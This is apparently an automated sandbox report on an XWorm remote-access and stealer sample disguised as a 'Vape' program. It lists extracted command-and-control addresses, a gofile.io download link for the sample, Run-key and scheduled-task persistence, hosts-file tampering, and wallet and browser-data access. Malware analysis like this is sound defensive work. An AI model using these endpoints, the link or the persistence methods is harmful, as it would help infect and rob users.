Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
20-04-2024 12:38
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
xworm
185.216.70.22:7000
127.0.0.1:7000
185.239.237.162:7000
-
Install_directory
%AppData%
-
install_file
GoogleUpdateCore.exe
Signatures
-
Detect Xworm Payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\GoogleUpdateCore.exe family_xworm behavioral1/memory/5608-185-0x0000000000B80000-0x0000000000B98000-memory.dmp family_xworm C:\Users\Admin\AppData\Roaming\discord.exe family_xworm behavioral1/memory/5452-344-0x0000000000970000-0x000000000098E000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
WAlletsd.exeupdater.exedescription pid process target process PID 668 created 3444 668 WAlletsd.exe Explorer.EXE PID 668 created 3444 668 WAlletsd.exe Explorer.EXE PID 668 created 3444 668 WAlletsd.exe Explorer.EXE PID 668 created 3444 668 WAlletsd.exe Explorer.EXE PID 668 created 3444 668 WAlletsd.exe Explorer.EXE PID 668 created 3444 668 WAlletsd.exe Explorer.EXE PID 6196 created 3444 6196 updater.exe Explorer.EXE PID 6196 created 3444 6196 updater.exe Explorer.EXE PID 6196 created 3444 6196 updater.exe Explorer.EXE PID 6196 created 3444 6196 updater.exe Explorer.EXE PID 6196 created 3444 6196 updater.exe Explorer.EXE PID 6196 created 3444 6196 updater.exe Explorer.EXE -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
WAlletsd.exeupdater.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts WAlletsd.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Vapev41.exeVapeV4.exeGoogleUpdateCore.exeVape Updated.exediscord.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation Vapev41.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation VapeV4.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation GoogleUpdateCore.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation Vape Updated.exe Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation discord.exe -
Drops startup file 2 IoCs
Processes:
discord.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk discord.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.lnk discord.exe -
Executes dropped EXE 14 IoCs
Processes:
Vapev41.exeGoogleUpdateCore.exeVapeV4.exeGoogleUpdateCore.exeVape Updated.exeVape.exeVape.exeWAlletsd.exediscord.exebound.exeupdater.exerar.exeGoogleUpdateCore.exediscord.exepid process 5728 Vapev41.exe 5608 GoogleUpdateCore.exe 1124 VapeV4.exe 4556 GoogleUpdateCore.exe 5372 Vape Updated.exe 2672 Vape.exe 5828 Vape.exe 668 WAlletsd.exe 5452 discord.exe 1924 bound.exe 6196 updater.exe 3428 rar.exe 5212 GoogleUpdateCore.exe 2320 discord.exe -
Loads dropped DLL 17 IoCs
Processes:
Vape.exepid process 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe 5828 Vape.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI26722\python311.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\libffi-8.dll upx behavioral1/memory/5828-342-0x00007FFB06160000-0x00007FFB0616F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\_socket.pyd upx behavioral1/memory/5828-375-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp upx behavioral1/memory/5828-374-0x00007FFAF15B0000-0x00007FFAF15D3000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\libssl-3.dll upx behavioral1/memory/5828-376-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp upx behavioral1/memory/5828-378-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp upx behavioral1/memory/5828-381-0x00007FFB06150000-0x00007FFB0615D000-memory.dmp upx behavioral1/memory/5828-380-0x00007FFAF1410000-0x00007FFAF1429000-memory.dmp upx behavioral1/memory/5828-384-0x00007FFAF12C0000-0x00007FFAF12D4000-memory.dmp upx behavioral1/memory/5828-385-0x00007FFB05FD0000-0x00007FFB05FDD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\libcrypto-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\_ssl.pyd upx behavioral1/memory/5828-398-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\select.pyd upx behavioral1/memory/5828-366-0x00007FFAF1850000-0x00007FFAF1869000-memory.dmp upx behavioral1/memory/5828-363-0x00007FFAF1870000-0x00007FFAF189D000-memory.dmp upx behavioral1/memory/5828-360-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\_bz2.pyd upx behavioral1/memory/5828-338-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp upx behavioral1/memory/5828-434-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp upx behavioral1/memory/5828-484-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp upx behavioral1/memory/4916-498-0x00000274212D0000-0x00000274212E0000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI26722\_ctypes.pyd upx behavioral1/memory/5828-546-0x00007FFADECF0000-0x00007FFADF210000-memory.dmp upx behavioral1/memory/5828-320-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp upx behavioral1/memory/5828-561-0x00007FFAF13D0000-0x00007FFAF1403000-memory.dmp upx behavioral1/memory/5828-562-0x00007FFAF1300000-0x00007FFAF13CD000-memory.dmp upx behavioral1/memory/5828-610-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp upx behavioral1/memory/5828-637-0x00007FFAEEC40000-0x00007FFAEED5C000-memory.dmp upx behavioral1/memory/5828-695-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp upx behavioral1/memory/5828-852-0x00007FFADDA00000-0x00007FFADDFE9000-memory.dmp upx behavioral1/memory/5828-858-0x00007FFAF1430000-0x00007FFAF15A7000-memory.dmp upx behavioral1/memory/5828-853-0x00007FFAF1DC0000-0x00007FFAF1DE3000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
bound.exeGoogleUpdateCore.exediscord.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" bound.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdateCore = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdateCore.exe" GoogleUpdateCore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\discord = "C:\\Users\\Admin\\AppData\\Roaming\\discord.exe" discord.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 112 ip-api.com 119 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
updater.exedescription pid process target process PID 6196 set thread context of 1348 6196 updater.exe conhost.exe PID 6196 set thread context of 7120 6196 updater.exe explorer.exe -
Drops file in Program Files directory 1 IoCs
Processes:
WAlletsd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe WAlletsd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 6172 sc.exe 384 sc.exe 4908 sc.exe 2356 sc.exe 5680 sc.exe 6128 sc.exe 7104 sc.exe 220 sc.exe 5388 sc.exe 6576 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5984 schtasks.exe 6696 schtasks.exe 6716 schtasks.exe 5776 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid process 2800 tasklist.exe 5668 tasklist.exe 2204 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6732 taskkill.exe 6112 taskkill.exe 3332 taskkill.exe 5772 taskkill.exe 6616 taskkill.exe 6212 taskkill.exe 6960 taskkill.exe 6172 taskkill.exe 6592 taskkill.exe 6264 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000_Classes\Local Settings msedge.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 235853.crdownload:SmartScreen msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
GoogleUpdateCore.exepid process 5608 GoogleUpdateCore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeWAlletsd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4984 msedge.exe 4984 msedge.exe 3512 msedge.exe 3512 msedge.exe 1716 identity_helper.exe 1716 identity_helper.exe 1388 msedge.exe 1388 msedge.exe 2316 powershell.exe 2316 powershell.exe 2316 powershell.exe 3652 powershell.exe 3652 powershell.exe 3652 powershell.exe 3584 powershell.exe 3584 powershell.exe 5292 powershell.exe 5292 powershell.exe 2832 powershell.exe 2832 powershell.exe 5292 powershell.exe 5292 powershell.exe 4916 powershell.exe 4916 powershell.exe 3584 powershell.exe 3584 powershell.exe 4944 powershell.exe 4944 powershell.exe 2764 powershell.exe 2764 powershell.exe 2832 powershell.exe 2832 powershell.exe 4944 powershell.exe 2764 powershell.exe 6464 powershell.exe 6464 powershell.exe 4916 powershell.exe 4916 powershell.exe 6464 powershell.exe 668 WAlletsd.exe 668 WAlletsd.exe 7140 powershell.exe 7140 powershell.exe 7140 powershell.exe 7024 powershell.exe 7024 powershell.exe 7024 powershell.exe 4572 powershell.exe 4572 powershell.exe 4572 powershell.exe 668 WAlletsd.exe 668 WAlletsd.exe 668 WAlletsd.exe 668 WAlletsd.exe 668 WAlletsd.exe 668 WAlletsd.exe 668 WAlletsd.exe 668 WAlletsd.exe 2480 powershell.exe 2480 powershell.exe 668 WAlletsd.exe 668 WAlletsd.exe 2480 powershell.exe 5164 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
Processes:
msedge.exepid process 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
GoogleUpdateCore.exeGoogleUpdateCore.exepowershell.exediscord.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exetasklist.exeWMIC.exetasklist.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 5608 GoogleUpdateCore.exe Token: SeDebugPrivilege 4556 GoogleUpdateCore.exe Token: SeDebugPrivilege 2316 powershell.exe Token: SeDebugPrivilege 5452 discord.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeDebugPrivilege 3584 powershell.exe Token: SeDebugPrivilege 5292 powershell.exe Token: SeDebugPrivilege 2832 powershell.exe Token: SeDebugPrivilege 5668 tasklist.exe Token: SeDebugPrivilege 4916 powershell.exe Token: SeDebugPrivilege 2800 tasklist.exe Token: SeIncreaseQuotaPrivilege 3724 WMIC.exe Token: SeSecurityPrivilege 3724 WMIC.exe Token: SeTakeOwnershipPrivilege 3724 WMIC.exe Token: SeLoadDriverPrivilege 3724 WMIC.exe Token: SeSystemProfilePrivilege 3724 WMIC.exe Token: SeSystemtimePrivilege 3724 WMIC.exe Token: SeProfSingleProcessPrivilege 3724 WMIC.exe Token: SeIncBasePriorityPrivilege 3724 WMIC.exe Token: SeCreatePagefilePrivilege 3724 WMIC.exe Token: SeBackupPrivilege 3724 WMIC.exe Token: SeRestorePrivilege 3724 WMIC.exe Token: SeShutdownPrivilege 3724 WMIC.exe Token: SeDebugPrivilege 3724 WMIC.exe Token: SeSystemEnvironmentPrivilege 3724 WMIC.exe Token: SeRemoteShutdownPrivilege 3724 WMIC.exe Token: SeUndockPrivilege 3724 WMIC.exe Token: SeManageVolumePrivilege 3724 WMIC.exe Token: 33 3724 WMIC.exe Token: 34 3724 WMIC.exe Token: 35 3724 WMIC.exe Token: 36 3724 WMIC.exe Token: SeDebugPrivilege 2204 tasklist.exe Token: SeDebugPrivilege 4944 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeIncreaseQuotaPrivilege 3724 WMIC.exe Token: SeSecurityPrivilege 3724 WMIC.exe Token: SeTakeOwnershipPrivilege 3724 WMIC.exe Token: SeLoadDriverPrivilege 3724 WMIC.exe Token: SeSystemProfilePrivilege 3724 WMIC.exe Token: SeSystemtimePrivilege 3724 WMIC.exe Token: SeProfSingleProcessPrivilege 3724 WMIC.exe Token: SeIncBasePriorityPrivilege 3724 WMIC.exe Token: SeCreatePagefilePrivilege 3724 WMIC.exe Token: SeBackupPrivilege 3724 WMIC.exe Token: SeRestorePrivilege 3724 WMIC.exe Token: SeShutdownPrivilege 3724 WMIC.exe Token: SeDebugPrivilege 3724 WMIC.exe Token: SeSystemEnvironmentPrivilege 3724 WMIC.exe Token: SeRemoteShutdownPrivilege 3724 WMIC.exe Token: SeUndockPrivilege 3724 WMIC.exe Token: SeManageVolumePrivilege 3724 WMIC.exe Token: 33 3724 WMIC.exe Token: 34 3724 WMIC.exe Token: 35 3724 WMIC.exe Token: 36 3724 WMIC.exe Token: SeDebugPrivilege 6464 powershell.exe Token: SeDebugPrivilege 7140 powershell.exe Token: SeDebugPrivilege 7024 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeShutdownPrivilege 5420 powercfg.exe Token: SeCreatePagefilePrivilege 5420 powercfg.exe Token: SeShutdownPrivilege 812 powercfg.exe Token: SeCreatePagefilePrivilege 812 powercfg.exe -
Suspicious use of FindShellTrayWindow 47 IoCs
Processes:
msedge.exepid process 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe 3512 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
discord.exepid process 5452 discord.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3512 wrote to memory of 2784 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 2784 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4548 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4984 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 4984 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe PID 3512 wrote to memory of 3116 3512 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/js8e8K2⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
